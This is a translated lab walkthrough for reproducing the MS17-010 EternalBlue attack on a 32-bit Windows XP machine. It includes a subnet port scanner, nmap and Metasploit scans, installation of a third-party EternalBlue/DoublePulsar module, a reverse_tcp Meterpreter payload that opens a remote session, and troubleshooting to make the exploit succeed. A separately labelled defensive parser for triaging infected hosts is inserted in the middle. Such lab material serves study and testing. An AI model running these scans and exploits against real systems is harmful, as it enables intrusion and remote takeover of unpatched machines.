MS17-010 vulnerability reproduction (32-bit systems), written up for study and discussion

I. Vulnerability background

1. Overview

  • EternalBlue is a vulnerability in the Equation Group's exploit framework that targets the SMB service; it allows an attacker to execute arbitrary code on the target system.
  • Note: the SMB service bridges Windows and Unix-family operating systems so that their resources can be shared with each other. For a detailed description of SMB, see the linked article.

2. Code-level analysis of the vulnerability

The following two articles analyse the vulnerability mechanism in detail from the actual code:

  • http://blogs.360.cn/post/nsa-eternalblue-smb.html#toc-772
  • https://blog.csdn.net/qq_27446553/article/details/73480807

II. Reproducing the vulnerability

1. Target information gathering

  • Using a Python script

Write your own Python port scanner and scan port 445 to find targets.

Here is the simple multithreaded port-scanning script I use:

import socket
import threading
import queue


class PortScan(threading.Thread):
    """Worker thread: pulls "ip:port" entries from the shared queue and tries a TCP connect."""

    def __init__(self, que, port_runner):
        threading.Thread.__init__(self)
        self.port_runner = port_runner
        self.que = que

    def scan_thread(self, ip_port):
        ip, port = ip_port.split(":")
        # Plain TCP connect test with a short timeout. Without a timeout every
        # unreachable host blocks the worker for the OS default (often over a minute).
        try:
            with socket.create_connection((ip, int(port)), timeout=1):
                with self.port_runner.port_threadLock:   # serialise output from many threads
                    print(ip_port)
        except OSError:
            pass   # closed, filtered or unreachable: nothing to report

    def run(self):
        while True:
            try:
                # Non-blocking get: checking empty() and then get() is a race between threads
                ip_port = self.que.get_nowait()
            except queue.Empty:
                return
            self.scan_thread(ip_port)


class ThreadClass():

    def run(self):
        ports = input("Port number: ")
        port_thread_count = int(input("Thread count: "))
        port_threads = []
        self.port_threadLock = threading.Lock()
        port_Queue = queue.Queue()
        # Hard-coded to the lab's 192.168.0.0/16; adjust for your own range
        for x in range(1, 255):
            for y in range(1, 255):
                host = "192.168.{}.{}".format(x, y)
                port_Queue.put(host + ":" + ports)
        for i in range(port_thread_count):
            port_threads.append(PortScan(que=port_Queue, port_runner=self))
        print('[*]Starting port_scan thread...')
        for i in range(port_thread_count):
            port_threads[i].start()
        for i in range(port_thread_count):
            port_threads[i].join()
        print("port_scan_test end of run")


if __name__ == '__main__':
    scan = ThreadClass()
    scan.run()
  • Using nmap

You can also run nmap from inside msf to gather information. For example, to scan service versions:
msf5 auxiliary(scanner/smb/smb_ms17_010) > nmap -sV 192.168.242.133
[*] exec: nmap -sV 192.168.242.133

Starting Nmap 7.70 ( https://nmap.org ) at 2019-12-12 18:23 CST
Nmap scan report for 192.168.242.133
Host is up (0.00042s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 00:0C:29:03:4D:C3 (VMware)
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.83 seconds

If the scan shows a service that may be vulnerable, you can search for that service in msf to see which modules are available for it.
Here the gathered information shows port 445 open on the target host, so we can try MS17-010 (EternalBlue).

  • Use an nmap script to check whether the MS17-010 vulnerability is present:

nmap --script=vuln targetip

C:\Users\admin\Desktop>nmap --script=vuln 192.168.242.133
Starting Nmap 7.70 ( https://nmap.org ) at 2019-12-12 17:22 中国标准时间
Nmap scan report for 192.168.242.133
Host is up (0.0028s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:03:4D:C3 (VMware)

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-double-pulsar-backdoor:
|   VULNERABLE:
|   Double Pulsar SMB Backdoor
|     State: VULNERABLE
|     Risk factor: HIGH  CVSSv2: 10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C)
|       The Double Pulsar SMB backdoor was detected running on the remote machine.
|
|     Disclosure date: 2017-04-14
|     References:
|       https://isc.sans.edu/forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312/
|       https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation
|_      https://github.com/countercept/doublepulsar-detection-script
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Nmap done: 1 IP address (1 host up) scanned in 37.88 seconds

2. Attempting the exploit

2.1. Look up the vulnerability modules: search ms17-010

msf5 > search ms17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
   2  exploit/windows/smb/doublepulsar_rce           2017-04-14       great    Yes    DOUBLEPULSAR Payload Execution and Neutralization
   3  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   4  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   5  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

You can see there are both auxiliary modules and exploit modules.

2.2. Scan first with the auxiliary module auxiliary/scanner/smb/smb_ms17_010

Here we scan the targets in the range 192.168.242.100-140:

msf5 > use auxiliary/scanner/smb/smb_ms17_010

msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.242.100-140
rhosts => 192.168.242.100-140
msf5 auxiliary(scanner/smb/smb_ms17_010) > set threads 30
threads => 30
msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit

[*] 192.168.242.100-140:445 - Scanned  9 of 41 hosts (21% complete)
[*] 192.168.242.100-140:445 - Scanned 23 of 41 hosts (56% complete)
[*] 192.168.242.100-140:445 - Scanned 26 of 41 hosts (63% complete)
[*] 192.168.242.100-140:445 - Scanned 30 of 41 hosts (73% complete)
[*] 192.168.242.100-140:445 - Scanned 31 of 41 hosts (75% complete)
[+] 192.168.242.133:445   - Host is likely VULNERABLE to MS17-010! - Windows 5.1 x86 (32-bit)
[!] 192.168.242.133:445   - Host is likely INFECTED with DoublePulsar! - Arch: x86 (32-bit), XOR Key: 0x8CC07018
[*] 192.168.242.100-140:445 - Scanned 33 of 41 hosts (80% complete)
[*] 192.168.242.100-140:445 - Scanned 34 of 41 hosts (82% complete)
[*] 192.168.242.100-140:445 - Scanned 35 of 41 hosts (85% complete)
[*] 192.168.242.100-140:445 - Scanned 37 of 41 hosts (90% complete)
[*] 192.168.242.100-140:445 - Scanned 41 of 41 hosts (100% complete)
[*] Auxiliary module execution completed

We can see that 192.168.242.133 is reported as likely vulnerable to MS17-010, and the module also identifies the operating system version for us, which makes it easier to choose the target OS parameter later.
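As an added example (not code from the original post), a small Python triage parser for the scanner output shown in this section and in the nmap --script=vuln run above: it merges the Metasploit smb_ms17_010 lines with nmap's smb-vuln-ms17-010 and smb-double-pulsar-backdoor host-script blocks, and orders hosts so that those already carrying the DoublePulsar implant are handled as incidents before the merely unpatched ones. The sample lines are shortened copies of this page's output plus one constructed host, 192.168.242.120, that is only vulnerable.

```python
import re
from dataclasses import dataclass

# Constructed sample: shortened copies of the smb_ms17_010 and nmap lines on this page,
# plus one made-up host (192.168.242.120) that is only vulnerable, to show the ordering.
SAMPLE = """\
[+] 192.168.242.133:445   - Host is likely VULNERABLE to MS17-010! - Windows 5.1 x86 (32-bit)
[!] 192.168.242.133:445   - Host is likely INFECTED with DoublePulsar! - Arch: x86 (32-bit), XOR Key: 0x8CC07018
Nmap scan report for 192.168.242.133
| smb-double-pulsar-backdoor:
|     State: VULNERABLE
| smb-vuln-ms17-010:
|     State: VULNERABLE
Nmap scan report for 192.168.242.120
| smb-vuln-ms17-010:
|     State: VULNERABLE
"""

MSF_VULN = re.compile(r"^\[\+\] (\S+):445\s+- Host is likely VULNERABLE to MS17-010! - (.+)$")
MSF_BACKDOOR = re.compile(r"^\[!\] (\S+):445\s+- Host is likely INFECTED with DoublePulsar!.*XOR Key: (0x[0-9A-Fa-f]+)")
NMAP_HOST = re.compile(r"^Nmap scan report for (\S+)")
NMAP_SCRIPT = re.compile(r"^\| (smb-vuln-ms17-010|smb-double-pulsar-backdoor):")
NMAP_STATE = re.compile(r"^\|\s+State: (\S+)")


@dataclass
class Finding:
    host: str
    vulnerable: bool = False   # unpatched SMBv1: patch or isolate
    backdoor: bool = False     # DoublePulsar implant answered: already compromised, incident response
    os_info: str = ""
    xor_key: str = ""


def parse_scan_output(text):
    """Merge Metasploit smb_ms17_010 lines and nmap host-script blocks into one Finding per host."""
    findings, host, script = {}, None, None
    for line in text.splitlines():
        if m := MSF_VULN.match(line):
            f = findings.setdefault(m[1], Finding(m[1]))
            f.vulnerable, f.os_info = True, m[2]
        elif m := MSF_BACKDOOR.match(line):
            f = findings.setdefault(m[1], Finding(m[1]))
            f.backdoor, f.xor_key = True, m[2]
        elif m := NMAP_HOST.match(line):
            host, script = m[1], None
        elif (m := NMAP_SCRIPT.match(line)) and host:
            script = m[1]          # only the two scripts we care about arm the State check
        elif (m := NMAP_STATE.match(line)) and script and m[1] == "VULNERABLE":
            f = findings.setdefault(host, Finding(host))
            setattr(f, "vulnerable" if script == "smb-vuln-ms17-010" else "backdoor", True)
            script = None
    return findings


def triage(findings):
    """Implanted hosts first (incident), then merely unpatched ones (patching), then by address."""
    return sorted(findings.values(), key=lambda f: (not f.backdoor, not f.vulnerable, f.host))
```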

2.3 Attack with the exploit module

The target is a 32-bit system, and msf does not yet ship an exploit module for it, so we need to download the module from the Internet and copy it into the right place.

Download and install the module

Download the GitHub project (the repository cloned below), rename the downloaded Eternalblue-Doublepulsar-Metasploit-master to Eternalblue-Doublepulsar-Metasploit, and copy the whole renamed directory into the root home directory.

Or clone it with git:

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git

Then copy the downloaded eternalblue_doublepulsar.rb into the /usr/share/metasploit-framework/modules/exploits/windows/smb/ directory.
On some installations the directory is /opt/metasploit-framework/embedded/framework/modules/exploits/windows/smb/ instead.

root@kali:~# cd Eternalblue-Doublepulsar-Metasploit/
root@kali:~/Eternalblue-Doublepulsar-Metasploit# cp eternalblue_doublepulsar.rb /opt/metasploit-framework/embedded/framework/modules/exploits/windows/smb/

Architecture support may be missing, so we need to install multi-architecture support, i.e. wine32:

dpkg --add-architecture i386 && apt-get update && apt-get install wine32

Using the exploit module

msf5 > reload_all  // reload the modules
msf5 > use exploit/windows/smb/eternalblue_doublepulsar  // load the module
// list the supported operating systems
msf5 exploit(windows/smb/eternalblue_doublepulsar) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows XP (all services pack) (x86) (x64)
   1   Windows Server 2003 SP0 (x86)
   2   Windows Server 2003 SP1/SP2 (x86)
   3   Windows Server 2003 (x64)
   4   Windows Vista (x86)
   5   Windows Vista (x64)
   6   Windows Server 2008 (x86)
   7   Windows Server 2008 R2 (x86) (x64)
   8   Windows 7 (all services pack) (x86) (x64)
// set the target OS: information gathering showed Windows 5.1, so we choose XP here
msf5 exploit(windows/smb/eternalblue_doublepulsar) > set target 0
target => 0
// set the options
msf5 exploit(windows/smb/eternalblue_doublepulsar) > set rhost 192.168.242.133   // target host
// load the payload
msf5 exploit(windows/smb/eternalblue_doublepulsar) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/eternalblue_doublepulsar) > set lhost 192.168.242.131  // set the listener
msf5 exploit(windows/smb/eternalblue_doublepulsar) > set processinject explorer.exe // change the process to inject into

// review the configuration
msf5 exploit(windows/smb/eternalblue_doublepulsar) > show options

Module options (exploit/windows/smb/eternalblue_doublepulsar):

   Name                Current Setting                                  Required  Description
   ----                ---------------                                  --------  -----------
   DOUBLEPULSARPATH    /root/Eternalblue-Doublepulsar-Metasploit/deps/  yes       Path directory of Doublepulsar
   ETERNALBLUEPATH     /root/Eternalblue-Doublepulsar-Metasploit/deps/  yes       Path directory of Eternalblue
   PROCESSINJECT       explorer.exe                                     yes       Name of process to inject into (Change to lsass.exe for x64)
   RHOSTS              192.168.242.133                                  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT               445                                              yes       The SMB service port (TCP)
   TARGETARCHITECTURE  x86                                              yes       Target Architecture (Accepted: x86, x64)
   WINEPATH            /root/.wine/drive_c/                             yes       WINE drive_c path

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.242.131  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows XP (all services pack) (x86) (x64)

// launch the attack
msf5 exploit(windows/smb/eternalblue_doublepulsar) > exploit

[*] Started reverse TCP handler on 192.168.242.131:4444
[*] 192.168.242.133:445 - Generating Eternalblue XML data
[*] 192.168.242.133:445 - Generating Doublepulsar XML data
[*] 192.168.242.133:445 - Generating payload DLL for Doublepulsar
[*] 192.168.242.133:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.242.133:445 - Launching Eternalblue...
0024:err:xrandr:xrandr12_init_modes Failed to get primary CRTC info.
000d:err:xrandr:xrandr12_init_modes Failed to get primary CRTC info.
[+] 192.168.242.133:445 - Backdoor is already installed
[*] 192.168.242.133:445 - Launching Doublepulsar...
[*] Sending stage (180291 bytes) to 192.168.242.133
[*] Meterpreter session 4 opened (192.168.242.131:4444 -> 192.168.242.133:1034) at 2019-12-12 19:25:16 +0800  // attack succeeded, reverse session opened
0024:err:xrandr:xrandr12_init_modes Failed to get primary CRTC info.
000d:err:xrandr:xrandr12_init_modes Failed to get primary CRTC info.
[+] 192.168.242.133:445 - Remote code executed... 3... 2... 1...

meterpreter > sysinfo
Computer        : ADMIN-F0F09A0D3
OS              : Windows XP (5.1 Build 2600, Service Pack 3).
Architecture    : x86
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > ipconfig

Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1


Interface  2
============
Name         : AMD PCNET Family PCI Ethernet Adapter - rface
Hardware MAC : 00:0c:29:03:4d:c3
MTU          : 1500
IPv4 Address : 192.168.242.133
IPv4 Netmask : 255.255.255.0

Note: according to the GitHub project's description, if explorer.exe fails you can change the processinject parameter to lsass.exe or another process.

If the attack fails, look through the problem summary below to see whether your issue is listed.

III. Problem summary

Problem 1

msf5 exploit(windows/smb/eternalblue_doublepulsar) > exploit

[*] Started reverse TCP handler on 192.168.242.131:4444
[*] 192.168.242.133:445 - Generating Eternalblue XML data
[*] 192.168.242.133:445 - Generating Doublepulsar XML data
[*] 192.168.242.133:445 - Generating payload DLL for Doublepulsar
[-] 192.168.242.133:445 - Exploit failed: Errno::ENOENT No such file or directory @ rb_sysopen - /root/.wine/drive_c/eternal11.dll
[*] Exploit completed, but no session was created.

Cause: the /root/.wine directory does not exist; running the following command creates it:

wine cmd.exe

Problem 2

Cause: wine opens a graphical window while it runs, which needs the Mozilla Gecko-based rendering engine; install the required wine-gecko version manually. First download the MSI binary provided by Wine; make sure to take the 32-bit version, because we installed wine32.

Solution:

wget https://dl.winehq.org/wine/wine-gecko/2.44/wine_gecko-2.44-x86.msi
Install wine-gecko:
wine msiexec /i wine_gecko-2.44-x86.msi

Or run the command from earlier:

dpkg --add-architecture i386 && apt-get update && apt-get install wine32

Problem 3

Cause: this is caused by the environment variables. The default is 64-bit and we need to reset them to 32-bit; run the following command to set the environment variables:

env WINEPREFIX=$HOME/.wine32 WINEARCH=win32 winecfg

Problem 4

Solution: once the wine-gecko library was installed during setup, this error no longer appeared, so if you see it, refer to Problem 2.

Problem 5 (the main problem):

[-] Handler failed to bind to 192.168.1.211:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] 192.168.1.132:445 - Generating Eternalblue XML data
[*] 192.168.1.132:445 - Generating Doublepulsar XML data
[*] 192.168.1.132:445 - Generating payload DLL for Doublepulsar
[*] 192.168.1.132:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.1.132:445 - Launching Eternalblue...
[-] Error getting output back from Core; aborting...
[-] 192.168.1.132:445 - Are you sure it's vulnerable?
[*] 192.168.1.132:445 - Launching Doublepulsar...
[-] 192.168.1.132:445 - Oops, something was wrong!
[*] Exploit completed, but no session was created.

Cause: the target may be unreachable, or a firewall or antivirus software is interfering.

Problem 6

[-] Handler failed to bind to 10.20.80.80:7666:-  -
[*] Started reverse TCP handler on 0.0.0.0:7666
[*] 10.50.2.253:445 - Generating Eternalblue XML data
[*] 10.50.2.253:445 - Generating Doublepulsar XML data
[*] 10.50.2.253:445 - Generating payload DLL for Doublepulsar
[*] 10.50.2.253:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 10.50.2.253:445 - Launching Eternalblue...
[+] 10.50.2.253:445 - Pwned! Eternalblue success!
[*] 10.50.2.253:445 - Launching Doublepulsar...
[-] 10.50.2.253:445 - Oops, something was wrong!
[*] Exploit completed, but no session was created.

Cause: the patch has probably been installed on the target.

Note: for `[-] Handler failed to bind to 192.168.242.131:4444:- -`, check whether your IP address is wrong or the port is already in use; if the port is in use, just change the listening port.

Problem 7

If the DLL file cannot be found, you may have lost some of the files when dragging Eternalblue-Doublepulsar-Metasploit-master into Kali; after copying, always compare against the original files.

Problem 8

msf5 exploit(windows/smb/eternalblue_doublepulsar) > exploit

[*] Started reverse TCP handler on 192.168.242.131:4444
[*] 192.168.242.133:445 - Generating Eternalblue XML data
[*] 192.168.242.133:445 - Generating Doublepulsar XML data
[*] 192.168.242.133:445 - Generating payload DLL for Doublepulsar
[*] 192.168.242.133:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.242.133:445 - Launching Eternalblue...
[+] 192.168.242.133:445 - Backdoor is already installed
[*] 192.168.242.133:445 - Launching Doublepulsar...
[+] 192.168.242.133:445 - Remote code executed... 3... 2... 1...

This case means it almost succeeded; change processinject or try the attack a few more times.

IV. Notes on using this module against Win7 x64:

If the target is 64-bit, further settings are needed:

(1) In the exploit/windows/smb/eternalblue_doublepulsar module:

set PROCESSINJECT lsass.exe
and
set TARGETARCHITECTURE x64

(2) Set the payload. Since the target is 64-bit, a 64-bit payload is required, otherwise no reverse session is obtained:

set payload windows/x64/meterpreter/reverse_tcp

References:

https://blog.csdn.net/userpass_word/article/details/85124266
https://bbs.ichunqiu.com/thread-23005-1-1.html
https://blog.csdn.net/qq_41617034/article/details/91051614

Patchwork series
